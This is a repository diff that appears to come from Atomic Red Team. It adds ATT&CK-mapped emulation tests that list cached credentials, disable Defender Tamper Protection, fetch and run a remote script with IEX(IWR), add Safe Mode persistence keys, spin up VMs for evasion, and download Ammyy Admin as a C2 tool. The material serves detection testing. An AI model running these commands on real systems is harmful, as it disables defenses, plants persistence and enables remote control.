 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/windows-matrix.md

@@ -4,7 +4,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | [Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/index.yaml

@@ -543,7 +543,24 @@ credential-access:
       - SYSTEM
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1003.005
+    atomic_tests:
+    - name: Cached Credential Dump via Cmdkey
+      auto_generated_guid: 56506854-89d6-46a3-9804-b7fde90791f9
+      description: |
+        List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
+        Credentials listed with Cmdkey only pertain to the current user
+        Passwords will not be displayed once they are stored
+        https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
+        https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'cmdkey /list
+
+'
   T1552.005:
     technique:
       external_references:
@@ -26556,6 +26573,20 @@ defense-evasion:
 '
         name: powershell
         elevation_required: true
+    - name: Disable Windows Defender Tamper Protection
+      auto_generated_guid: 5fde6578-9419-46ef-9258-269dc8656c3e
+      description: Disabling Windows Defender tamper protection to allow attacks such
+        as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f).
+        Tamper Protection will be disabled after the next reboot.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+          New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+        cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
+          Defender\Feature' -name 'TamperData' -value 1
+        name: powershell
   T1078.002:
     technique:
       external_references:
@@ -29764,6 +29795,21 @@ defense-evasion:
           } catch { }
         name: powershell
         elevation_required: true
+    - name: Add Root Certificate to CurrentUser Certificate Store
+      auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
+      description: |
+        The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+        Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+        Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+      supported_platforms:
+      - windows
+      executor:
+        command: "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1'
+          -UseBasicParsing) \n"
+        cleanup_command: "Get-ChildItem -Path Cert:\\ -Recurse | Where-Object { $_.Thumbprint
+          -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item \n"
+        name: powershell
+        elevation_required: true
   T1218.004:
     technique:
       id: attack-pattern--2cd950a6-16c4-404a-aa01-044322395107
@@ -32266,6 +32312,44 @@ defense-evasion:
           reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
         name: command_prompt
         elevation_required: true
+    - name: Windows Add Registry Value to Load Service in Safe Mode without Network
+      auto_generated_guid: 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5
+      description: |
+        Modify the registry to allow a driver, service, to persist in Safe Mode.
+        see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
+        Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode"
+          /VE /T REG_SZ /F /D “Service”
+
+'
+        cleanup_command: 'reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode"
+          /f
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows Add Registry Value to Load Service in Safe Mode with Network
+      auto_generated_guid: c173c948-65e5-499c-afbe-433722ed5bd4
+      description: |
+        Modify the registry to allow a driver, service, to persist in Safe Mode with networking.
+        see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
+        Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode"
+          /VE /T REG_SZ /F /D “Service”
+
+'
+        cleanup_command: 'reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode"
+          /f
+
+'
+        name: command_prompt
+        elevation_required: true
   T1601:
     technique:
       external_references:
@@ -37049,6 +37133,107 @@ defense-evasion:
           regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
           msiexec /x #{msi_file_path} /qn
         name: command_prompt
+    - name: Create and start VirtualBox virtual machine
+      auto_generated_guid: 88b81702-a1c0-49a9-95b2-2dd53d755767
+      description: |
+        Create a simple VirtualBox VM and start up the machine
+        Cleanup command stops and deletes the newly created VM and associated files
+        https://www.virtualbox.org/manual/ch08.html#vboxmanage-startvm
+        https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
+        https://attack.mitre.org/techniques/T1564/006/
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_name:
+          description: Name of the new virtual machine
+          type: String
+          default: Atomic VM
+        virtualbox_exe:
+          description: Path to the VirtualBox executable
+          type: Path
+          default: C:\Program Files\Oracle\VirtualBox\VirtualBox.exe
+        vboxmanage_exe:
+          description: Path to the executable for VBoxManage, the command-line interface
+            to VirtualBox
+          type: Path
+          default: C:\Program Files\Oracle\VirtualBox\VBoxManage.exe
+        virtualbox_download:
+          description: URL for the current installer for the Windows version of VirtualBox,
+            as of March 2022
+          type: Url
+          default: https://download.virtualbox.org/virtualbox/6.1.32/VirtualBox-6.1.32-149290-Win.exe
+        virtualbox_installer:
+          description: Executable for the Virtualbox installer
+          type: String
+          default: VirtualBox-6.1.32-149290-Win.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'VirtualBox must exist on disk at specified locations (#{virtualbox_exe})
+
+'
+        prereq_command: 'if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          Invoke-WebRequest "#{virtualbox_download}" -OutFile $env:TEMP\#{virtualbox_installer}
+          $env:TEMP\#{virtualbox_installer}
+      - description: 'VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})
+
+'
+        prereq_command: 'if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          Invoke-WebRequest "#{virtualbox_download}" -OutFile $env:TEMP\#{virtualbox_installer}
+          $env:TEMP\#{virtualbox_installer}
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          "#{vboxmanage_exe}" createvm --name "#{vm_name}" --register
+          "#{vboxmanage_exe}" modifyvm "#{vm_name}" --firmware efi
+          "#{vboxmanage_exe}" startvm "#{vm_name}"
+        cleanup_command: |-
+          "#{vboxmanage_exe}" controlvm "#{vm_name}" poweroff
+          "#{vboxmanage_exe}" unregistervm "#{vm_name}" --delete
+    - name: Create and start Hyper-V virtual machine
+      auto_generated_guid: fb8d4d7e-f5a4-481c-8867-febf13f8b6d3
+      description: |
+        Create a simple Hyper-V VM (Windows native hypervisor) and start up the machine
+        Cleanup command stops and deletes the newly created VM
+        https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
+        https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/
+        https://attack.mitre.org/techniques/T1564/006/
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_name:
+          description: Name of the new virtual machine
+          type: String
+          default: Atomic VM
+      dependencies:
+      - description: |
+          Hyper-V must be enabled on the system
+          Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart
+        prereq_command: 'if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State
+          = "Enabled") {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V
+          -All -Force
+
+'
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |-
+          $VM = "#{vm_name}"
+          New-VM -Name $VM -Generation 2
+          Set-VMFirmware $VM -EnableSecureBoot Off
+          Start-VM $VM
+        cleanup_command: |-
+          Stop-VM $VM -Force
+          Remove-VM $VM -Force
   T1218.011:
     technique:
       id: attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
@@ -73271,6 +73456,39 @@ command-and-control:
           msiexec /x $installer /qn
         name: powershell
         elevation_required: true
+    - name: Ammyy Admin Software Execution
+      auto_generated_guid: 0ae9e327-3251-465a-a53b-485d4e3f58fa
+      description: "An adversary may attempt to trick the user into downloading Ammyy
+        Admin Remote Desktop Software for use as a C2 channel. \nUpon successful execution,
+        Ammyy Admin will be executed. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        Ammyy_Admin_Path:
+          description: Path of Ammyy Admin executable
+          type: Path
+          default: "$env:temp\\ammyy.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})
+
+'
+        prereq_command: 'if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Start-BitsTransfer -Source "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe"
+          -Destination "$env:temp\ammyy.exe" -dynamic
+
+'
+      executor:
+        command: 'Start-Process #{Ammyy_Admin_Path}
+
+'
+        cleanup_command: 'Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue
+
+'
+        name: powershell
+        elevation_required: true
   T1132.001:
     technique:
       external_references:

atomics/T1003.005/T1003.005.md

@@ -0,0 +1,47 @@
+# T1003.005 - Cached Domain Credentials
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/005)
+<blockquote>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
+
+On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
+
+With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
+
+Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Cached Credential Dump via Cmdkey](#atomic-test-1---cached-credential-dump-via-cmdkey)
+
+
+<br/>
+
+## Atomic Test #1 - Cached Credential Dump via Cmdkey
+List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
+Credentials listed with Cmdkey only pertain to the current user
+Passwords will not be displayed once they are stored
+https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
+https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 56506854-89d6-46a3-9804-b7fde90791f9
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+cmdkey /list
+```
+
+
+
+
+
+
+<br/>

atomics/T1003.005/T1003.005.yaml

@@ -2,6 +2,7 @@ attack_technique: T1003.005
 display_name: 'OS Credential Dumping: Cached Domain Credentials'
 atomic_tests:
 - name: Cached Credential Dump via Cmdkey
+  auto_generated_guid: 56506854-89d6-46a3-9804-b7fde90791f9
   description: |
     List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
     Credentials listed with Cmdkey only pertain to the current user
@@ -11,7 +12,7 @@ atomic_tests:
   supported_platforms:
     - windows
   executor:
-  - name: command_prompt
+    name: command_prompt
     elevation_required: false
     command: |
       cmdkey /list

atomics/T1112/T1112.md

@@ -74,6 +74,10 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #32 - Windows Powershell Logging Disabled](#atomic-test-32---windows-powershell-logging-disabled)
 
+- [Atomic Test #33 - Windows Add Registry Value to Load Service in Safe Mode without Network](#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network)
+
+- [Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode with Network](#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network)
+
 
 <br/>
 
@@ -1200,4 +1204,72 @@ reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #33 - Windows Add Registry Value to Load Service in Safe Mode without Network
+Modify the registry to allow a driver, service, to persist in Safe Mode.
+see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
+Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /VE /T REG_SZ /F /D “Service”
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode with Network
+Modify the registry to allow a driver, service, to persist in Safe Mode with networking.
+see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
+Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c173c948-65e5-499c-afbe-433722ed5bd4
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /VE /T REG_SZ /F /D “Service”
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /f
+```
+
+
+
+
+
 <br/>

atomics/T1112/T1112.yaml

@@ -516,3 +516,34 @@ atomic_tests:
       reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: Windows Add Registry Value to Load Service in Safe Mode without Network
+  auto_generated_guid: 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5
+  description: |
+    Modify the registry to allow a driver, service, to persist in Safe Mode.
+    see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
+    Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /VE /T REG_SZ /F /D “Service”
+    cleanup_command: |
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /f
+    name: command_prompt
+    elevation_required: true
+- name: Windows Add Registry Value to Load Service in Safe Mode with Network
+  auto_generated_guid: c173c948-65e5-499c-afbe-433722ed5bd4
+  description: |
+    Modify the registry to allow a driver, service, to persist in Safe Mode with networking.
+    see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
+    Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /VE /T REG_SZ /F /D “Service”
+    cleanup_command: |
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /f
+    name: command_prompt
+    elevation_required: true
+

atomics/T1219/T1219.md

@@ -18,6 +18,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
 
 - [Atomic Test #5 - ScreenConnect Application Download and Install on Windows](#atomic-test-5---screenconnect-application-download-and-install-on-windows)
 
+- [Atomic Test #6 - Ammyy Admin Software Execution](#atomic-test-6---ammyy-admin-software-execution)
+
 
 <br/>
 
@@ -198,4 +200,54 @@ msiexec /x $installer /qn
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Ammyy Admin Software Execution
+An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel. 
+Upon successful execution, Ammyy Admin will be executed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0ae9e327-3251-465a-a53b-485d4e3f58fa
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| Ammyy_Admin_Path | Path of Ammyy Admin executable | Path | $env:temp&#92;ammyy.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Start-Process #{Ammyy_Admin_Path}
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -Destination "$env:temp\ammyy.exe" -dynamic
+```
+
+
+
+
 <br/>

atomics/T1219/T1219.yaml

@@ -87,3 +87,30 @@ atomic_tests:
       msiexec /x $installer /qn
     name: powershell
     elevation_required: true
+- name: Ammyy Admin Software Execution
+  auto_generated_guid: 0ae9e327-3251-465a-a53b-485d4e3f58fa
+  description: |
+    An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel. 
+    Upon successful execution, Ammyy Admin will be executed. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    Ammyy_Admin_Path:
+      description: Path of Ammyy Admin executable
+      type: Path
+      default: $env:temp\ammyy.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})
+    prereq_command: |
+      if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Start-BitsTransfer -Source "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -Destination "$env:temp\ammyy.exe" -dynamic
+  executor:
+    command: |
+      Start-Process #{Ammyy_Admin_Path}
+    cleanup_command: | 
